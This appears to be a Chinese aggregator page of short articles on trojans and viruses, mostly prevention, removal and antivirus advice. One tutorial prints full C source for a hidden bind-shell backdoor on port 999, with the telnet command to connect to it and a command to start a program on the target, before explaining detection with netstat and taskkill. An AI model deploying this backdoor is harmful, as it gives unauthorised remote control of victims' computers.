为您找到与什么是木马如何防范木马相关的共200个结果:
面对电脑病或者木马,你有什么方法去防范它们呢?下面由读文网小编给你做出详细的防范电脑病毒和木马常用方法介绍!希望对你有帮助!
1、腾讯电脑管家独有的二代反病毒引擎,防护查杀更彻底
2、腾讯电脑管家拥有全球最大的云库平台,能更好的识别诈骗、钓鱼网站
3、腾讯电脑管家独创鹰眼模式,时刻保护您的爱机不受侵害
4、腾讯电脑管家独有的安全等级,您可以时刻查看你爱机的安全状态
5、新增广告过滤功能,有效减轻广告骚扰。
浏览量:3
下载量:0
时间:
木马病毒无处不在,危害着我们,战胜木马,该怎么办?下面由读文网小编给你做出详细的防范asp木马十大原则介绍!希望对你有帮助!
1、建议用户通过ftp来上传、维护网页,尽量不安装asp的上传程序。
2、对asp上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。
这其中包括各种新闻发布、商城及论坛程序,只要可以上传文件的asp都要进行身份认证!
3、asp程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。
4、到正规网站下载asp程序,下载后要对其数据库名称和存放路径进行修改,数据库文件名称也要有一定复杂性。建议我公司的客户使用.mdb的数据库文件扩展名,因为我公司服务器设置了.mdb文件防下载功能。
5、要尽量保持程序是最新版本。
6、不要在网页上加注后台管理程序登陆页面的链接。
7、为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再通过ftp上传即可。
8、要时常备份数据库等重要文件。
9、日常要多维护,并注意空间中是否有来历不明的asp文件。记住:一分汗水,换一分安全!
10、一旦发现被入侵,除非自己能识别出所有木马文件,否则要删除所有文件。
重新上传文件前,所有asp程序用户名和密码都要重置,并要重新修改程序数据库名称和存放路径以及后台管理程序的路径。
做好以上防范措施,您的网站只能说是相对安全了,决不能因此疏忽大意,因为入侵与反入侵是一场永恒的战争!
看了“防范asp木马十大原是什么”文章的还看了:
浏览量:2
下载量:0
时间:
最近一段时间,从各大杀毒软件厂商发布的病毒报告中可以看到,木马病毒目前在互联网上泛滥情况十分严重,并且已经形成完整的病毒产业链。下面由读文网小编给你做出详细的电脑病毒潜入和防范介绍!希望对你有帮助!
那么究竟什么是木马病毒?它是如何入侵电脑?作为普通网民又应如何防范?
当然,没有人想主动感染病毒。那么木马病毒是怎么传播的呢?目前最主要的就是通过挂马网站,也就是网页上带有木马的网站。据瑞星“云安全”系统统计,目前网上90%以上的木马病毒都是通过挂马网站传播。用户访问了“带毒”网页后,如果没有安装性能良好的杀毒软件,就会瞬间感染数十甚至上百个木马病毒。大量的色情、赌博、非法彩票和游戏外挂网站基本上都含有木马病毒,用户一旦访问,通常都会中招。而传统的传播方式如带毒电子邮件附件、U盘等,则已经基本被黑客“放弃”。
木马病毒能给病毒制造者带来巨大经济利益,这已形成了所谓的“木马产业链”。现在的病毒黑客集团分工明确、合作紧密,具有很强的“专业素养”。
病毒制造者会根据“病毒买家”的需求,定制各式各样的病毒,直接获利。“病毒买家”又会将所购买的病毒进行传播,他们会付钱给一些黑客,去“拿站”或“黑站”,也就是将木马病毒植入网站。当大量用户感染后,这些病毒买家首先会盗取用户电脑中的游戏账号密码、网银账号密码和个人隐私信息,然后盗取用户的游戏装备并在网上出售获利,或者利用网上银行网上购物或转账。更有一些黑客会拿用户的私密照片、视频来敲诈勒索。黑客还会通过远程控制木马,让用户的电脑成为任由其摆布的“肉鸡”,来攻击网站,让网站无法正常浏览,然后要挟被攻击网站的站长交“保护费”。这类网络犯罪案件目前发生的频率越来越高。
在互联网上,黑客将大量木马病毒的编写代码进行公布,这使木马病毒制作变得更加简单。很多木马生成器也不断诞生,你可能没有非常专业的编程技术,但也可以在很短的时间内,制作出大量新的木马病毒。
浏览量:2
下载量:0
时间:
人生病了,会有各种各样的症状,同样,电脑中毒了也会有一些中毒反应。如果你的电脑有如下症状,要赶紧用杀毒软件查个毒了。以下是读文网小编给大家整理的防范木马及病毒的方法,希望能帮到你!
大家一定都听说过木马病毒,但木马病毒到底是什么呢?
(一)木马病毒
木马病毒是指通过特定的程序(木马程序)来控制另一台计算机。木马通常有两个可执行程序:一个是控制端,另一个是被控制端。木马这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的特洛伊木马本意是“特洛伊的”,即代指特洛伊木马,也就是木马计的故事)。“木马”程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种主机的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种主机。木马病毒的产生严重危害着现代网络的安全运行。
(二)木马病毒的种类
木马不是马,但是它也有不同的品种,让小笔记给大家介绍一下常见的木马变种吧。
1.网游木马
网络游戏木马通常采用记录用户键盘输入、Hook游戏进程、API函数等方法获取用户的密码和帐号。窃取到的信息一般通过发送电子邮件或向远程脚本程序提交的方式发送给木马作者。
网络游戏木马的种类和数量,在国产木马病毒中都首屈一指。流行的网络游戏无一不受网游木马的威胁。一款新游戏正式发布后,往往在一到两个星期内,就会有相应的木马程序被制作出来。大量的木马生成器和黑客网站的公开销售也是网游木马泛滥的原因之一。
2.网银木马
网银木马是针对网上交易系统编写的木马病毒,其目的是盗取用户的卡号、密码,甚至安全证书。此类木马种类数量虽然比不上网游木马,但它的危害更加直接,受害用户的损失更加惨重。
网银木马通常针对性较强,木马作者可能首先对某银行的网上交易系统进行仔细分析,然后针对安全薄弱环节编写病毒程序。2013年,安全软件电脑管家截获网银木马最新变种“弼马温”,弼马温病毒能够毫无痕迹的修改支付界面,使用户根本无法察觉。通过不良网站提供假QVOD下载地址进行广泛传播,当用户下载这一挂马播放器文件安装后就会中木马,该病毒运行后即开始监视用户网络交易,屏蔽余额支付和快捷支付,强制用户使用网银,并借机篡改订单,盗取财产。
随着中国网上交易的普及,受到外来网银木马威胁的用户也在不断增加。
3.FTP木马
FTP型木马打开被控制计算机的21号端口(FTP所使用的默认端口),使每一个人都可以通过一个FTP客户端程序、不用密码就可直接连接到受控制端计算机,并且可以进行最高权限的上传和下载,窃取受害者的机密文件。新FTP木马还加上了密码功能,这样,只有攻击者本人才知道正确的密码,从而进入对方计算机。
(三)木马病毒的危害
希腊人凭借一只大木马攻下了特洛伊的城门,而黑客们会用木马程序攻破你满是漏洞的电脑,造成各种危害。
1、盗取我们的网游账号,威胁我们的虚拟财产的安全
木马病毒会盗取我们的网游账号,盗取帐号后,并立即将帐号中的游戏装备转移,再由木马病毒使用者出售这些盗取的游戏装备和游戏币而获利。
2、盗取我们的网银信息,威胁我们的真实财产的安全
木马采用键盘记录等方式盗取我们的网银帐号和密码并发送给黑客,直接导致经济损失。
3、利用即时通讯软件盗取我们的身份,传播木马病毒等不良信息
中了木马病毒的电脑会下载病毒作者指定的程序,具有不确定的危害性,如使电脑瘫痪等。
浏览量:3
下载量:0
时间:
电脑已经走进我们的生活,与我们的生活息息相关,感觉已经离不开电脑与网络,对于电脑安全防范,今天小编在这里给大家推荐一些电脑病毒与木马防范相关文章,欢迎大家围观参考,想了解更多,请继续关注读文网。
一、前言
病毒与木马技术发展到今天,由于二者总是相辅相成,你中有我,我中有你,所以它们之间的界限往往已经不再那么明显,相互之间往往都会采用对方的一些技术以达到自己的目的,所以现在很多时候也就将二者直接统称为“恶意代码”。这次我打算用两篇文章的篇幅来讨论病毒与简单的木马相互结合的分析与防范方法。本篇也就是第一篇,讨论的是利用只有服务器端的木马程序实现“病毒”的启动。而在下一篇中,我会讨论既有服务器端又有客户端的木马程序与“病毒”相结合的分析与防范。
二、简单木马的原理
由于木马技术与计算机网络息息相关,所以也就离不开Socket套接字编程。这里我不打算详述Socket套接字编程的细节,这个在MSDN上有非常详细的讲述,无非就是根据套接字的编程的流程,将相应的内容填入“模板”。而既然要实现通信的效果,就需要遵循一个通信模型,木马一般都是C/S(客户端/服务端)模式的。本篇文章所要论述的,虽然不涉及客户端的编写,但实际上我只不过是把cmd程序当成了客户端,因此本质上还是C/S模式的。
C/S模型的开发,需要在服务器端(欲攻击的计算机)上绑定一个IP地址和一个端口号,然后进行监听,等待客户端(攻击方)的连接。客户端则是向相应的IP地址和端口号发起连接,服务器端接受后,双方就可以开始进行通信,这就是基于TCP协议的通信,也是接下来要用到的方法。另外还有一种基于UDP协议的方法,这种方法是在服务器端进行相应的绑定后,客户端不需要进行连接直接就可以和服务器进行通信。可见,TCP要比UDP可靠,而UDP要比TCP效率高。
本篇文章所论述的服务器端编程的基本原理如下:
1、打开一通信通道(绑定某个端口)并告知本地主机,它在某一个地址上接收客户请求。可以采用socket和bind函数实现。
2、等待用户请求到达该端口。利用listen函数实现。
3、接收到服务请求,处理该请求并发送应答信号。利用accept函数实现。
4、返回第二步,等待其他客户的请求。
5、关闭连接。利用closesocket函数实现。
以上所使用的函数顺序如下:
socket()→bind()→listen()→accept()→closesocket()
三、木马的编程实现
当服务器端运行这个程序后,客户端可以利用telnet向服务器端发起连接,成功后自动打开cmd窗口,就可以通过DOS命令来直接控制服务器端的目标计算机,代码如下:
#pragma comment(lib,"ws2_32.lib") #include
#include #define MasterPort 999 https://欲利用的端口号
int main()
{ WSADATA WSADa;
sockaddr_in SockAddrIn; SOCKET CSocket,SSocket;
int iAddrSize; PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo; char szCMDPath[255];
https://初始化数据
ZeroMemory(&ProcessInfo,sizeof(PROCESS_INFORMATION)); ZeroMemory(&StartupInfo,sizeof(STARTUPINFO));
ZeroMemory(&WSADa,sizeof(WSADATA)); https://获取CMD路径
GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath));
https://加载ws2_32.dll WSAStartup(0x0202,&WSADa);
https://设置本地信息和绑定协议,建立Socket SockAddrIn.sin_family = AF_INET;
SockAddrIn.sin_addr.S_un.S_addr = INADDR_ANY; SockAddrIn.sin_port = htons(MasterPort);
CSocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0); https://设置绑定端口999
bind(CSocket,(sockaddr *)&SockAddrIn,sizeof(SockAddrIn)); https://设置服务器端监听端口
listen(CSocket,1); iAddrSize = sizeof(SockAddrIn);
https://开始连接远程服务器,并配置隐藏窗口结构体
SSocket = accept(CSocket,(sockaddr *)&SockAddrIn,&iAddrSize); StartupInfo.cb = sizeof(STARTUPINFO);
StartupInfo.wShowWindow = SW_HIDE; StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
StartupInfo.hStdInput = (HANDLE)SSocket; StartupInfo.hStdOutput = (HANDLE)SSocket;
StartupInfo.hStdError = (HANDLE)SSocket; https://创建匿名管道
CreateProcess(NULL,szCMDPath,NULL,NULL,TRUE,0,NULL,NULL,&StartupInfo,&ProcessInfo); WaitForSingleObject(ProcessInfo.hProcess,INFINITE);
https://关闭进程句柄
CloseHandle(ProcessInfo.hProcess); CloseHandle(ProcessInfo.hThread);
https://关闭套接字 closesocket(CSocket);
closesocket(SSocket); https://释放ws2_32.dll动态链接库
WSACleanup();
return 0; }
由于代码比较简单,这里不再进行分析。
四、木马与“病毒”的结合利用
之前文章所讨论的“病毒”的自启动方式,都是需要借助于“外力”作用,而这次我的“病毒”则是通过植入木马,连接成功后输入DOS命令来启动,但是前提是木马需要先启动。这里我用了两台计算机(也可以使用虚拟机),一台是客户端,一台是服务器端,服务器端已经放置了木马程序,现在就在服务器端执行该木马。之后在客户端中打开cmd程序,输入:
[plain] view plaincopy
telnet 192.168.1.107 999
这句命令的意思是通过telnet进行远程登录,连接到ip地址为192.168.1.107的计算机上的999号端口。成功后就可以发现已经连接到了对方的计算机上:
那么此时就可以通过DOS命令对目标计算机进行控制。这里假设目标计算机的E盘根目录下保存有我之前编写的Hacked.exe程序,那么可以通过输入如下命令进行运行:
[sql] view plaincopy
start e:hacked.exe
此时Hacked.exe程序已经在目标计算机上执行,显示如下:
当然,我这里是假设Hacked.exe已放入对方的电脑,这个前提会有诸多的限制,因为更好的方法是将Hacked.exe程序由客户端传到服务器端再进行启动。不过,由于这个方法比较危险,为了避免别有用心的人拿它去做不轨的事情,因此不再深入讨论。我的原则始终是以讨论如何更好地防范恶意程序为主,而对于恶意代码的实现,也就是点到为止。无需多加讨论的,坚决不进行深入探讨。
五、木马的查杀
上述代码所实现的是一个比较简单的正向连接后门程序,并没有添加进程隐藏功能,也没有增加启动项目,也就是说,当服务器端计算机重新启动后,这个木马就失效了,需要重新运行才可以。我这里讲讲如何手动查杀。当服务器端被植入木马后,服务器端可以进入cmd(若cmd被映像劫持可参考我之前的文章),然后输入命令:
[plain] view plaincopy
netstat –ano
这个命令可以查看当前的网络连接状态,如图所示:
在图中可以看到,本地端口999与IP地址为192.168.1.104的主机建立了TCP连接,而且也可以看到进程的ID值为1292(每次启动木马的PID值可能不一样)。对于一般的木马来说,在命令提示符下就可以实现“查”的操作,随着以后讨论的深入,木马复杂度会不断加深,我可能会使用专业查杀工具或者采用自制的工具实现“查”的功能。
利用PID值可以查看进程的文件名,输入:
[plain] view plaincopy
tasklist | find “1292”
就可以知道PID值为1292的进程的名称为“MiniTrojan.exe”。之后使用PID值就能够将木马进程从计算机中删除,这里用taskkill命令:
[plain] view plaincopy
taskkill /f /pid 1292 /t
这句命令的意思是,强制(/f)终止PID值为1292 的进程和任何由此启动的进程(/t)。最后一步是找到MiniTrojan.exe的位置,并删除,就能够彻底将木马赶出计算机了,这里不再赘述。
六、小结
这篇文章所讲的木马程序需要在cmd下运行,尽管远不如图形界面直观,但是这小小的木马,也能够造成很大的威胁了。不过,这毕竟是一匹“小马”,采用简单的DOS命令就能够查杀,还是很好对付的。其实手动查杀病毒木马的流程就是这样,查木马病毒往往需要经验,需要敏锐的嗅觉,之后的“杀”的阶段,需要先把病毒木马的进程结束掉,然后才能删掉其主程序。即便是复杂的恶意程序,基本上也是这个原理。
浏览量:1
下载量:0
时间:
常玩QQ或者网游的朋友相信都家都听说过盗号木马这种病毒,同样这种病毒也能盗取我们的银行账号、淘宝用户名及密码等等,那么什么叫木马病毒呢?
木马,全称特洛伊木马(Trojan horse),这个词语来源于古希腊神话,在计算机领域是一种客户/服务器程序,是黑客最常用的基于远程控制的工具。目前,比较有名的国产木马有:“冰 河”、“广外女生”、“黑洞”、“黑冰”等;国外有名的木马则有:“SubSeven”、“Bo2000(Back Orifice)”、“NetSpy”、“Asylum”等。木马对计算机系统和网络安全危害相当大,因此,如何防范特洛伊木马入侵成为了计算机网络安全 的重要内容之一。
木马病毒的传播可以通过QQ聊天时发送带有病毒的链接或者发送带有病毒的压缩包(有诱惑力内容的文件),一旦点击链接,打开压缩包就会中木马程序。很多5173的dnf什么的就是这样被盗取帐号,密码,导致财产损失的。以下的防范措施可以参考:
一、不要接收陌生人发来的任何压缩包文件及其他类型文件;
二、对可疑的文件(压缩包)进行杀毒;
三、不要接收任何自己不能确定类型的压缩包文件或者其他类型文件;
四、不要到不良网站下载不良信息文件,并加压安装到你的电脑;
五、电脑定期杀毒;
六、将QQ的安全防范级别设置为最高
这些知识只是偶遇到的一些问题的总结,关键是自己要建立防范的心理准备,近期好多手机短信说什么中了非常6+1李咏大哥的幸运蛋什么的,让输入自己的银行账号啊什么地。这个千万不要信,老土的方法了。骗子的方法是层出不穷,利用高科技等等等等。为什么被骗了,有个名人说的很好,只是骗子的智商比我们高一些!
浏览量:2
下载量:0
时间:
我们在下载了一些压缩包后,经常在解压的时候,安全软件就会提醒我们文件有木马的这些提示,那么怎么解决解压经常遇到病毒木马呢?下面读文网小编就为大家带来了解决解压经常遇到病毒木马的方法。
当我们从网上下载一些视频、音频的RAR或ZIP格式的压缩包,解包后有时会发现,其中可能会有一个或多个名字是“播放必读”或“安装必读”之类的文件,这些文件或者是扩展名为LNK的HTML网页链接文件,甚至是EXE、COM、BAT、CMD、SCR格式的可执行文件,注册表REG文件,点击之后连接到一个网站上或运行一个含有广告信息的页面,甚至会莫名其妙地一闪而过,貌似什么也没做。但之后也许你会发现系统运行明显比原来慢了,这很有可能是被误导连接到黑客或木马网站上或运行了木马程序,致使电脑中招了。
对于下载来的影音文件包,我们一般都是使用其中的声音文件或视频文件,多余的链接文件或可执行文件与我们无关,完全可以不予理会。既然如此,那么,能否在解包时就将这些无关的,但可能存在危险的文件排除在外并过滤掉呢?
我们可以通过压缩软件(如WinRAR)本身的功能来将其过滤掉,通过设置将这些危险文件排除在使用之外。
第一步:
启动WinRAR,单击“选项→设置”菜单命令(或直接按下Ctrl+S组合键),打开“设置”窗口(图1)。
第二步:
切换到“安全”标签下,勾选“解压时排除的文件类型”复选框,并在下面的文本框中追加输入“*.html *.asp *.reg”等。若有多个排除的文件类型,两两之间用半角空格分隔,例如“*.exe *.com *.pif *.scr *.bat *.cmd *.lnk *.html *.asp *.reg”等(图2)。
第三步:
以上设置完毕之后,单击“确定”。这样设置后,以后解压压缩包时,这些类型的文件就不会被释放,做到了“取其精华,去其糟粕”的目的。
如果我们要对软件压缩包进行解压,那么其中的有用信息可能正好是我们过滤掉的文件类型。这时,只需在WinRAR设置窗口的“安全”选项卡下,将“解压时排除的文件类型”复选框前的钩去掉即可。
如果使用好压软件,需要先进入“设置”窗口,点击“压缩”选项卡,点击“修改默认配置”(图3)。然后在弹出的“修改默认压缩配置”窗口中,在“要排除的文件列表”文本框中输入需要排除的文件扩展名(如*.reg *.cmd等)(图4)。
以上就是解压常遇病毒木马的解决方法介绍,操作很简单的,大家按照上面步骤进行操作即可,希望这篇文章能对大家有所帮助!
看过“怎么解决解压经常遇到病毒木马”
浏览量:6
下载量:0
时间:
木马病毒利用受感染的电脑主动感染其他连接的电脑,症状可能是档案损毁,当机,慢机,应用程式无法执行等等,那么你知道如何清除木马病毒感染吗?下面是读文网小编整理的一些关于清除木马病毒感染的相关资料,供你参考。
清除木马可以很简单亦可以非常专业。难度是有些木马会骑劫浏览器令你无法更新清除木马病毒程式的数据库,变相废掉你的防毒程式和防木马程式。
1.下载并安装 Malwarebytes 反恶意软件。
2.选择执行快速扫描,然后点击扫描按钮,开始搜索恶意文件。
3.完成时,您将看到一个屏幕,显示 Malwarebytes 检测到的感染。确保一切感染都被选中(打勾),然后点击删除所选按钮,或者乾脆选择 (Quarantee All)。
如果您在互联网搜索什麽是 spigot,你会发现 spigot 是一个广告软件在浏览过程中自动弹出的广告。另一个好删除木马程式是 Hitman Pro.
4.一般清除木马病毒为了保险会用多个免费扫描程式。除了 Malwarebtyes 外,我亦会用 Kaspersky 线上版。防毒软件供应商多少有点靠吓来造生意。说你电脑有问题不一定是真有问题,很多是设定需要。所以你主要关心 Malware 这部份。
5.亦会用 adwcleaner 清除广告木马病毒。广告木马病毒 (比如 find22) 的造法是在你浏览时骑劫,先访问它的广告伺服器调出广告内容,变相将浏览器拖慢。
6.曾经遇过非常凶狼的木马,令 Chrome 和 Firefox 都不能上网,只能用 IE上网。用 IE 上网时自动跳到一大堆广告网站。清除木马亦失败原因是不让你更生木马数据库。最后知道对方是改动了 Windows 连线的架构,要以指令 “netsh winsock reset" 还原 Network Adapter 正常架构,然后更新木马数据库才能清除该广告木马。
清除木马病毒感染的相关
浏览量:2
下载量:0
时间:
十年前的电脑病毒基本上是损人不利己。病毒利用受感染的电脑主动感染其他连接的电脑,症状可能是档案损毁,当机,慢机,应用程式无法执行等等,那么你知道怎么清除木马病毒感染吗?下面是读文网小编整理的一些关于清除木马病毒感染的相关资料,供你参考。
清除木马可以很简单亦可以非常专业。难度是有些木马会骑劫浏览器令你无法更新清除木马病毒程式的数据库,变相废掉你的防毒程式和防木马程式。
1.下载并安装 Malwarebytes 反恶意软件。
2.选择执行快速扫描,然后点击扫描按钮,开始搜索恶意文件。
3.完成时,您将看到一个屏幕,显示 Malwarebytes 检测到的感染。确保一切感染都被选中(打勾),然后点击删除所选按钮,或者乾脆选择 (Quarantee All)。
如果您在互联网搜索什麽是 spigot,你会发现 spigot 是一个广告软件在浏览过程中自动弹出的广告。另一个好删除木马程式是 Hitman Pro.
4.一般清除木马病毒为了保险会用多个免费扫描程式。除了 Malwarebtyes 外,我亦会用 Kaspersky 线上版。防毒软件供应商多少有点靠吓来造生意。说你电脑有问题不一定是真有问题,很多是设定需要。所以你主要关心 Malware 这部份。
5.亦会用 adwcleaner 清除广告木马病毒。广告木马病毒 (比如 find22) 的造法是在你浏览时骑劫,先访问它的广告伺服器调出广告内容,变相将浏览器拖慢。
6.曾经遇过非常凶狼的木马,令 Chrome 和 Firefox 都不能上网,只能用 IE上网。用 IE 上网时自动跳到一大堆广告网站。清除木马亦失败原因是不让你更生木马数据库。最后知道对方是改动了 Windows 连线的架构,要以指令 “netsh winsock reset" 还原 Network Adapter 正常架构,然后更新木马数据库才能清除该广告木马。
清除木马病毒感染的相关
浏览量:2
下载量:0
时间:
你知道360木马防火墙的位置吗?不会小编就来为你介绍!下面由读文网小编给你做出详细的360木马防火墙位置介绍!希望对你有帮助!
打开安全软件,点击安全防护中心。(可能不同版本的安全软件按钮位置不同,请仔细查找)
如图
进入安全防护中心后,点击安全设置(可能不同版本的安全软件按钮位置不同,请仔细查找)
如图
进入安全设置后,根据自己的需求设置。木马分网络网站挂马,软件木马绑定多种。
如图
设置完成后,点击求人即可。
看了“ 360木马防火墙位置在哪”文章的还看了:
浏览量:2
下载量:0
时间:
我的电脑最近老是中病毒!想要方法防范下!用什么方法好呢?下面由读文网小编给你做出详细的防范电脑病毒方法介绍!希望对你有帮助!
电脑病毒是凡与电脑打交道的人都不能避免的问题,以往的电脑病毒只是通过驱盘,光盘或局域网传播的,随着互联网(广域网)的日益广泛使用,通过互联网的下载程序、收发电子邮件等环节感染电脑病毒机会大幅增加,如何进行防范就成了上网用户必不可少的一个步骤。
电脑病毒的危害主要是:一是删除主板的BIOS芯片内容,这会造成硬件的损坏,甚至是永久性损坏(如无法找到相同型号的BIOS芯片);二是将硬盘的分区删去或将硬盘所有内容全部删去;三是删去或篡改硬盘中的可执行文件(如COM和EXE类型文件)使大部分系统不能正常运作;四是删去操作系统的引导必要文件
导致电脑无法正常起动;五是堵塞某些端口(如打印机接口)使外部设备无法正常工作。下面就进行防范的常用方法:
在电脑主板CMOS设置中设置防止对硬盘的分区和格式化的保护
通常的设法是:进入CMOS(一般开机或重置或热启动后按Del键进入)→选择“BIOS FEATURES SETUP”→选择“Virus Warning”→ 设置为“Enabled”→按“ESC“键→选择“SAVE & EXIT SETUP”后按回车键→选择“Y”后按回车→重启动后即可。以后该电脑硬盘的重新分区和格式化将受到保护。
浏览量:3
下载量:0
时间:
电脑病毒,即计算机病毒,它是一种人为制造的(有意识或无意识地)破坏计算机系统运行和破坏计算机文件的一种程序。那么电脑怎样防范病毒呢?接下来大家跟着读文网小编一起来了解一下防范电脑病毒的解决方法吧。
安装杀毒软件
安装杀毒软件是防治各种病毒的不二法则,无论是出于什么原因不安装杀毒软件就上网或者使用外来的磁盘,就像房间里面放着贵重物品但是却没有安装一道门一样,如果没有小偷光顾也只能说明是幸运,但是不可能一直会有这种情况发生。
实时监测,跟新病毒库
安装了杀毒软件并不代表已经完事大吉了,还需要把实时监视保护的程序运行起来。同时,为了保证杀毒软件能够检测出所有的病毒,还需要定时更新病毒库,
安装各种补丁
只要是软件,就会有各种缺陷,操作系统作为最关键的一个软件,里面包含的缺陷一点也不少,因此有许多的升级包,如果用户不安装,被有心人留意到后,就会成为一个重大漏洞,冲击波病毒就是这个样子,它利用操作系统的漏洞直接传染病毒,如果只是安装了杀毒软件,并不能解决中毒的问题。因此,最好补丁相当于关上了后门。
不要随便打开邮件以及附件
在2003暖白的统计中,80%的病毒是通过邮件进行传播的,因此,邮件中的附件已经成为病毒的只要携带者,因此,在接收到陌生人的邮件的时候,不要急于打开,尤其是附件,更不应该随便运行。
不要随意使用软盘和光盘 尤其是u盘
一般来讲,软件中包含病毒的可能性很大,当然这个不是绝对的,因为也曾经出现或整版软件带毒的情况。
下载的软件要求杀毒以后再使用
随着网络的应用,很多用户都是直接下载软件使用,就像磁盘的使用一样,我们需要先查毒再使用,而且网络上下载的软件还是小心其中包含各种木马
避免打开完全控制/写入权限的共享】
在公司里面可能会使用局域网,共享文件是我们交换文件的一个很重要途径,但是共享文件的时候,尽量避免对共享文件夹打开写的权限,因为很多病毒会搜索局域网中共享文件夹,并把病毒文件试着放到该共享文件中,这样,用户在使用该文件夹的时候,就有可能无意当 中运行了病毒,从而被感染。
一、关于计算机病毒:
1、计算机病毒的类型及特点
(1)计算机病毒是通过复制自身从而感染其它程序的指令代码或程序。当染毒文件运行时,病毒也随之运行并自我复制来感染其它程序。不过,良性病毒没有恶意攻击性性的代码,只占用系统的资源,让系统运行减慢。但是对大多数的恶性病毒却是携带恶意攻击性的毒码,一旦被激发,即可感染和破坏。自80年代由莫里斯编写的第一个“蠕虫”病毒程序问世以来,世界上已出现了多种不同类型的病毒。主要有以下几种主要病毒:“美丽杀手”(Melissa)病毒、“怕怕”(Papa)病毒、“疯牛”(Mad Cow)病毒和“怕怕B”病毒、 “幸福1999”宏病毒、“咻咻”(Ping)轰击病毒、冲击波病毒、熊猫烧香病毒、木马病毒等。
(2)归纳一下,计算机病毒有以下几种特点:一是隐蔽性强。病毒可以在毫无察觉的情况下感染计算机而不被人察觉,等到发现时,就已经造成了严重后果。二是繁殖能力强。电脑一旦染毒,可以很快“发病”。三是传染途径广。可通过移动设备、有线和无线网络、硬件设备等多渠道自动侵入计算机中,并不断传染。四是潜伏期长。病毒可以长期潜伏在计算机系统而不发作,等达到激发条件后,就发作破坏系统。五是破坏力大。计算机病毒一旦发作,轻则干扰系统的正常运行,重则破坏磁盘数据、删除文件,甚至导致整个计算机系统的瘫痪。
二、对计算机病毒的防范可以采用的方法可从管理上和技术上进行预防
1.管理上的预防。
(1)不使用来历不明的软件,尤其是盗版软件。机房应禁止未经检测的移动盘插入计算机,严禁上机打游戏。因为游戏的运行环境较多,传染病毒的可能性较大。
(2)本单位使用的计算机应有严格的使用权限。
(3)对所有的系统盘以及移动盘进行写保护,防止盘中的文件被感染。
(4)系统中的重要文件要进行备份,尤其是数据要定期备份。
(5)网络上要限制可执行代码的交换,建立好较好的口令,规定合理的读写权限。 以上是适合于局部小单位,计算机的发展至今,已经在技术上和应用中成为一个社会的问题,最终,还是需要国家制定的法律法规进行约束。
2.技术方法上的预防
(1)采用内存常驻防病毒的程序 在系统启动盘的AUTOEXE.BAT文件中加入一个病毒检测程序,它将时刻监视病毒的侵入,并对磁盘进行检查。由于这种方法要占用内存空间,又容易引起与其他程序的冲突,有些病毒具有躲开防毒程序的功能,所以,不能把它作为防病毒的主要武器。
(2)运行前对文件进行检测
这种方法主要采用杀毒软件进行检查,不是所以的杀毒软件都能清楚所有病毒,所以还是要注意以预防为主。
(3)改变文档的属性
只读文档时不能修改的,有些病毒只能去掉只读标志,不能改变属性。这种方法不失为一种简单的方法来预防病毒。但它只是针对一般的文件型病毒而言。
(4)改变文件扩展名
由于计算机感染时必须采用了解文件的属性,对每种不同的文件都必须使用不同的传染方式,将可执行文件的扩展名改变后,多数病毒会失去效力。
看过“”
浏览量:3
下载量:0
时间:
计算机病毒传播的非常快,危害也非常大!那么我们要怎么样去防范计算机病毒呢?下面由读文网小编给你做出详细的防范计算机病毒方法介绍!希望对你有帮助!
购买或在网上下载有关在线检测病毒的软件或防火墙,将其设置成在线检测状态,这就会在遇到一般的病毒感染都会即时报警并将其拒绝安装。
但必须注意,安装了这种软件并不是就万事大吉了,
原因有:
一是电脑病毒与人体病毒类似,是不断地被发现的,已有的防电脑病毒软件是不一定能对新的电脑病毒有检测和防范作用的
二是防电脑病毒软件也会被电脑病毒感染的,正如人类医学中的消毒药品也会被病毒感染一样;因此要经常对所使用的防电脑病毒软件进行升级换代处理。
对一些要长时间保留的资料必须要有永久保留备份的处理,如用只读光盘或可读写光盘、磁盘或磁带、打印出来保留等多种资料备份方式保存,不要因为现时所用的硬盘足够大容量存放就掉以轻心,否则就会是一失足成千古恨了。
对电脑的各种板卡及外部设备的驱动程序(一般用软盘和光盘存贮)要全部保留,不能因为硬盘上有存档就以为丢弃,要有当硬盘随时受损时能够重新安装的打算。
在条件许可的情况下应将电脑应用的层次分开,如财务应用、业务资料处理等所用电脑与上网查资料、学生学习、多媒体电脑应用等分开,使之在物理层面上分隔开来,从而降低重要电脑数据资料被电脑病毒入侵受损的可能性。
加强电脑技术和技能的学习,掌握各种基础软件的使用技巧,电脑病毒虽然发作起来破坏力大,但仍是可以避免和控制的,只要对其有充分的认识,就能筑起心理上和技术防范措施上的防线,区别出是病毒危害还是误操作所引起的后果,将其的影响降至最低消除。
浏览量:2
下载量:0
时间:
我们经常说的计算机病毒和木马!那么它们到底有什么区别呢?下面由读文网小编给你做出详细的电脑病毒和木马区别介绍!希望对你有帮助!
木马和病毒都是一种人为的程序,都属于电脑病毒,为什么木马要单独提出来说内?大家都知道以前的电脑病毒的作用,其实完全就是为了搞破坏,破坏电脑里的资料数据,除了破坏之外其它无非就是有些病毒制造者为了达到某些目的而进行的威慑和敲诈勒索的作用,或为了炫耀自己的技术. "木马"不一样,木马的作用是赤裸裸的偷偷监视别人和盗窃别人密码,数据等,如盗窃管理员密码-子网密码搞破坏,或者好玩,偷窃上网密码用于它用,游戏帐号,股票帐号,甚至网上银行帐户等.达到偷窥别人隐私和得到经济利益的目的.所以木马的作用比早期的电脑病毒更加有用.更能够直接达到使用者的目的!导致许多别有用心的程序开发者大量的编写这类带有偷窃和监视别人电脑的侵入性程序,这就是目前网上大量木马泛滥成灾的原因.鉴于木马的这些巨大危害性和它与早期病毒的作用性质不一样,所以木马虽然属于病毒中的一类,但是要单独的从病毒类型中间剥离出来.独立的称之为"木马"程序.
